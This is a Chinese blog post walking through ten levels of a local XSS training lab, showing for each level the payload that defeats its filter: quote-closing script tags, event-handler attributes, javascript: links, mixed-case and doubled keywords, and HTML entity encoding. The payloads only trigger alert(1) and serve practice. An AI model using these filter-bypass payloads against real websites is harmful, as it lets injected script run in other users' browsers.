小白简述XSS靶机(一)

已于 2022-07-20 10:17:16 修改
阅读量1.2k 收藏 5
点赞数 1
分类专栏: 笔记 文章标签: xss 前端 javascript
于 2021-03-24 15:08:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/my3325/article/details/115175622
版权

配置环境

虚拟机:Windows7–>IP:192.168.50.248
工具:phpstudy5.4.45
浏览器:火狐渗透版
靶场:

链接:链接:https://pan.baidu.com/s/1l1T1K0QyJrnv22vabC6pRw 
提取码:t6z4

第一关

在这里插入图片描述
先输入XSS的代码

<script>alert(1);</script>

在这里插入图片描述
直接弹窗了,第一关没啥难度

第二关

还是一样,先输入代码

<script>alert(1);</script>

在这里插入图片描述
发现输入的代码打印出来了,按F12查看一下,发现value属性没有加过滤,直接闭合
在这里插入图片描述

输入代码

"><script>alert(1);</script>

在这里插入图片描述

第三关

直接输入

"><script>alert(1);</script>

在这里插入图片描述
发现输入的也是直接打印出来了,还是按F12查看一下,发现尖括号被转义了
在这里插入图片描述
重新构造pyload,鼠标在搜索框里过一下

' onmousemove='javascript:alert(1)

在这里插入图片描述

第四关

直接输入上关的代码
在这里插入图片描述
输入的被打印出来,按F12查看,发现单引号未闭合
在这里插入图片描述
改换成双引号,鼠标移动到搜索框

" onmousemove="javascript:alert(1)

在这里插入图片描述

第五关

使用上关的代码
在这里插入图片描述
输入的被打印出来的,按F12查看,ON被过滤了
在这里插入图片描述

使用html的标签过,并点击搜索框旁边的尖括号

"> <a href='javascript:alert(1)'>

在这里插入图片描述

第六关

使用上关的代码
在这里插入图片描述
输入的被打印出来的,按F12查看,href被过滤了
在这里插入图片描述
使用大小写绕过

"><ScRiPt>alert(1)</ScRIpT>

在这里插入图片描述

第七关

使用上关的代码
在这里插入图片描述
输入的被打印出来的,按F12查看,script被过滤了
在这里插入图片描述
使用双写来绕过

"> <scrscriptipt>alert(1)</scrscriptipt>

在这里插入图片描述

第八关

使用上关的代码
在这里插入图片描述
发现输入的并点击友情链接都给打印出来了,按F12查看,发现是汉字
在这里插入图片描述

那么HTML实体编码并点击友情链接

javascript:alert(1)
&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

在这里插入图片描述

第九关

使用上关的代码
在这里插入图片描述
提示连接不合法,那么重新构造一下

javascrip&#x74;:alert(1)//http://www.baidu.com

在这里插入图片描述

第十关

输入"><script>alert(1);</script>
在这里插入图片描述

输入的打印出来了,按F12查看
在这里插入图片描述
发现t_sort可以使用,构造pyload,并点击搜索框

t_sort=" onclick=alert(1) type="text"

在这里插入图片描述

一宸、
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
xss.haozi.me靶机
newlife1441的博客
07-28 335
对auto和on开头只要加上等于号就会变为下划线,加上大于号大于号也会变为下划线,这里其实就是过滤了autoforce和onerror事件,我们可以使用一个换行的技巧前提要加一个type属性值image和src映射路径属性,然后再让等于号和属性分开。虽然这里对我们可以使用的单引号、双引号等字符进行了转义但是我们可以发现,如果我们输入双引号它会显示/",并没有将双引号成功过滤,所以我们还是可以去使用。alert(1)时需要换行。.........
XSS靶机通关以及XSS介绍
S_cx666的博客
08-01 612
XSS靶机通关
网络安全-靶机pikachu之xss注入与代码分析(XSStrike实战)_反序列入漏洞工具+pikachu+xss(1)
2401_84264662的博客
05-09 317
使用第2个吧,burpsuite拦截,修改post数据。
xsslabs靶机解题_web 攻击靶机解题过程
weixin_39625337的博客
12-19 192
sql注入靶机攻击过程请参考https://pentesterlab.com/exercises/from_sqli_to_shell/coursehttp://www.sohu.com/a/126855490_472906xss靶机的攻击过程请参考https://pentesterlab.com/exercises/xss_and_mysql_file/course在192.168.179.12...
xsslabs靶机解题_web渗透靶机平台介绍
weixin_39673601的博客
12-19 310
正文:一.dvwa资源 (sql,xss,csrf,暴力,Command Injection,File Inclusion,File Upload,Insecure CAPTCHA)sql-labs资源(单 sql 的全面学习,普通,时间,bool,报错,事件,联合)网络安全实验室(脚本关,注入关,上传关,解密关,综合关)实验吧(web,密码学,安全杂项,逆向,隐写,编程,溢出)+(一些综合型的...
XSS基础及搭建DVWA靶机
CoderOne
01-20 395
XSS简述 跨站脚本攻击XSS(Cross Site Scripting),通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。XSS是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 XSS原理 HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML
web漏扫-appscan漏扫软件扫描靶机并分析-xss,sql等详细笔记总结
06-30
web漏扫-appscan漏扫软件扫描靶机并分析-xss,sql等详细笔记总结
详解XSS 和 CSRF简述及预防措施
10-17
主要介绍了XSS 和 CSRF简述及预防措施,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
xss-labs挑战(一) 1
08-08
XSS-labs 挑战(一)1 本文将详细介绍 XSS-labs 挑战(一)1 的知识点,包括挑战的安装、Level 1 无过滤机制、Level 2 闭合标签、Level 3 单引号闭合+htmlspecialchar()函数、Level 4 双引号闭合+添加事件、Level 5...
第一节 自动化xss挖掘介绍-01
09-15
xsser是一款功能强大且灵活的自动化XSS挖掘工具,旨在帮助Web安全测试员和开发者快速发现和修复Web应用程序中的XSS漏洞。xsser工具可以自动化地扫描Web应用程序,检测潜在的XSS漏洞,并提供详细的漏洞报告。 xsser...
第一节 XSS跨站脚本分类-01
09-15
XSS 跨站脚本攻击是一种常见的 Web 应用程序安全漏洞,攻击者可以通过在 Web 页面中插入恶意 Script 代码来攻击用户。为了防止 XSS 攻击,需要了解 XSS 的分类和特点。 XSS 漏洞介绍 XSS 跨站脚本攻击(Cross Site...
xss靶机训练【实现弹窗即成功】
Miracle_ze的博客
07-29 3737
xss的绕过
xss靶机过关
weixin_63083809的博客
08-02 243
alert(1)原理一样闭合value输入">alert(1)>alert(1)
xss.haozi.me在线靶机挑战
m0_49137360的博客
08-01 421
xss.haozi.me靶场练习
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 4602
web靶场-xss-labs靶机平台的搭建和代码审计
【转载】XSS靶机专项练习(总结)
xhc6666的博客
05-22 554
XSS靶机测试专项练习总结
Pikachu靶机系列之XSS(Cross-Site Scripting)
来到了学渣的博客
01-12 2190
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 本节目录: 概述 反射型xss(get) 反射型xss(post) 存储型xss Dom型xss Dom型xss-s Xss盲打 Xss之过滤 Xss之htmlspecialchars Xss之href输出 Xss之js输出 麦迪Tmac 前文: P...
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
Button12138的博客
12-09 1502
我们输入的信息被存放在name。
[ 靶场环境篇 ] XSS-labs 靶场环境搭建(特别详细)
热门推荐
qq_51577576的博客
12-10 1万+
想入门渗透行业呢光有理论基础是不够的,更重要的是实践经验。 接下来我会分享一些入门级靶场,从环境搭建一直到通关教程。 入门级靶场会分享:pikachu、DVWA、XSS-labs、sql-labs、upload-labs等内容。 上篇文章写到了 pikachu 靶场的搭建,本文写 XSS-lab 靶场环境的搭建。 目录 一、环境准备 1 搭建环境 2 下载链接 二、安装教程 1. 首先我们需要搭建好PHP study: 2. 下载 xss-labs 靶场源码 3.解压缩并放入如下..
简述xss漏洞的原理以及如何验证存在xss漏洞
最新发布
05-12
XSS(Cross Site Scripting)攻击是一种常见的Web攻击方式,它的原理是攻击者通过注入恶意脚本代码到网页中,使得用户在浏览网页时执行该恶意代码,从而达到攻击者的目的。攻击者可以利用XSS漏洞窃取用户的敏感信息、篡改网页内容、利用用户身份进行非法操作等。 XSS漏洞可以分为存储型、反射型和DOM型三种类型。存储型XSS漏洞是指攻击者将恶意脚本代码存储到服务器中,当用户访问包含该恶意脚本的页面时就会执行。反射型XSS漏洞是指攻击者将恶意脚本代码作为参数注入到页面中,当服务器返回响应时,恶意脚本代码会被浏览器执行。DOM型XSS漏洞是指攻击者将恶意脚本代码作为参数注入到网页中,当浏览器解析网页时就会执行。 验证是否存在XSS漏洞可以通过手工测试或者使用相关工具进行自动化测试。手工测试需要注意输入点的类型和位置,例如表单输入框、URL参数、Cookie等,同时需要尝试输入各种特殊字符和标签,如<script>、<img>等。常用的自动化测试工具包括XSStrike、W3af、OWASP ZAP等。这些工具可以自动扫描Web应用程序中可能存在XSS漏洞的地方,并生成报告。但是需要注意的是,自动化工具测试的结果可能存在误报或漏报,需要结合手工测试进行综合评估。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值